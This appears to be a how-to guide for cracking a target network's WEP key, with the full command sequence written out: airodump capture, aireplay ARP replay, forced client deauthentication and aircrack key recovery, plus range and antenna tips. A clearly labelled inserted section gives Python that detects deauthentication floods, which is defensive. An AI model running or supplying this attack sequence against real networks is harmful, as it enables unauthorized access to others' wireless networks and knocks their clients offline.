The first thing you need to do is run airodump to capture the necessary IVs.

usage: airodump wlan0 <file prefix> <channel> 1

e.g.

#airodump wlan0 capture 9 1

Do NOT close airodump. Open a new shell and start aireplay:

usage: aireplay -3 -b <network BSSID> -h <client MAC address> -m 68 -n 68 -d ff:ff:ff:ff:ff:ff wlan0

If you are unable to capture an ARP packet, you can disassociate the client to force it to ARP. You can do this using file2air: open a third shell and start file2air with the following parameters:

#file2air -i wlan0 -r hostap -n 8000 -d <client MAC address> -s <APs MAC address> -b <Networks BSSID> -c <channel> -f /KNOPPIX/files/deauth.bin

or use aireplay

#aireplay -0 50 -a <AP_MAC> -c <Client_MAC> wlan0

NOTE: The channel option (-c) must be used with this attack.

If this fails to produce an ARP packet, you will have to try one or more of the following:

Move closer to the target
Use a high gain antenna
Increase the number after the -n from 8000
Try a different .bin file, such as beacon.bin
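From the defender's side, the deauthentication step above is exactly what a wireless IDS watches for: a burst of deauth frames from one source to one client far denser than an access point would ever send legitimately. The Python below is an added example, not part of this guide or of the aircrack/file2air tools; it parses raw 802.11 management frame headers, counts deauth frames per (source, destination) pair in a sliding one-second window, and flags pairs over a threshold. The MAC addresses, frames and threshold are constructed for illustration.

```python
"""Detect 802.11 deauthentication floods in a list of (timestamp, raw 802.11 frame) records."""
import struct
from collections import defaultdict

DEAUTH_FC0 = 0xC0  # frame control byte 0: version 0, type 0 (management), subtype 12 (deauth)
MGMT_HDR = struct.Struct("<HH6s6s6sH")  # frame control, duration, addr1, addr2, addr3, seq ctrl

def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)

def mac_bytes(text):
    return bytes(int(x, 16) for x in text.split(":"))

def parse_deauth(frame):
    """Return (dst, src, bssid, reason_code) if `frame` is a deauth frame, else None."""
    if len(frame) < MGMT_HDR.size + 2 or frame[0] != DEAUTH_FC0:
        return None
    _, _, a1, a2, a3, _ = MGMT_HDR.unpack_from(frame)
    reason = struct.unpack_from("<H", frame, MGMT_HDR.size)[0]
    return mac_str(a1), mac_str(a2), mac_str(a3), reason

def deauth_floods(records, window=1.0, threshold=10):
    """Return {(src, dst): peak count} for pairs with more than `threshold` deauths in any `window` seconds."""
    stamps = defaultdict(list)
    for ts, frame in records:
        parsed = parse_deauth(frame)
        if parsed:
            stamps[(parsed[1], parsed[0])].append(ts)
    floods = {}
    for pair, ts_list in stamps.items():
        ts_list.sort()
        start = 0
        for end, ts in enumerate(ts_list):  # sliding window over sorted timestamps
            while ts - ts_list[start] > window:
                start += 1
            if end - start + 1 > threshold:
                floods[pair] = max(floods.get(pair, 0), end - start + 1)
    return floods

def build_deauth(dst, src, bssid, reason=7):
    """Constructed sample deauth frame (not captured traffic); reason 7 = class 3 frame from non-associated STA."""
    return MGMT_HDR.pack(DEAUTH_FC0, 0, mac_bytes(dst), mac_bytes(src), mac_bytes(bssid), 0) + struct.pack("<H", reason)

AP, VICTIM, OTHER = "00:11:22:33:44:55", "66:77:88:99:aa:bb", "cc:dd:ee:ff:00:11"  # constructed addresses

def sample_records():
    """Constructed capture: 50 spoofed deauths in half a second, two benign ones, one beacon."""
    flood = [(i * 0.01, build_deauth(VICTIM, AP, AP)) for i in range(50)]
    benign = [(5.0, build_deauth(OTHER, AP, AP)), (9.0, build_deauth(OTHER, AP, AP))]
    beacon = [(2.0, bytes([0x80, 0x00]) + bytes(22) + b"\x00" * 12)]
    return flood + benign + beacon

if __name__ == "__main__":
    print(deauth_floods(sample_records()))  # {('00:11:22:33:44:55', '66:77:88:99:aa:bb'): 50}
```

Feeding it frames from a real monitor-mode capture only requires stripping the radiotap header first; the two benign deauths in the sample stay below the threshold while the burst is reported with its peak count.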

You will need to capture approximately 1 million IVs to crack a 128-bit WEP key. When you have done this, run aircrack:

#aircrack capture.ivs

NOTE: It is possible to run aircrack in parallel with airodump, but in practice I have found that this will not always crack the WEP key; once airodump has been stopped, the WEP key is usually found in a matter of seconds.
